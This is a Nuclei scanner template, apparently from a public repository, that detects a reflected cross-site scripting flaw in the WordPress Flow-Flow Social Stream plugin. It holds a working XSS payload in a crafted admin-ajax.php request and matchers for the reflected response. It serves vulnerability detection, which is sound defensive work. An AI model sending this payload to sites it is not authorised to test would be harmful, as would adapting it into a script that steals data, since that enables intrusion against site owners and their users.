nuclei-templates/http/vulnerabilities/wordpress/flow-flow-social-stream-xss...

40 lines
1.0 KiB
YAML

id: flow-flow-social-stream-xss
info:
name: WordPress Flow-Flow Social Stream <=3.0.71 - Cross-Site Scripting
author: alph4byt3
severity: medium
description: WordPress Flow-Flow Social Stream 3.0.7.1 and prior is vulnerable to cross-site scripting.
reference:
- https://wpscan.com/vulnerability/8354b34e-40f4-4b70-bb09-38e2cf572ce9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
tags: xss,wordpress,wpscan
metadata:
max-request: 1
http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"hash":"<img src=x onerror=alert(document.domain)>"'
- '"errors"'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200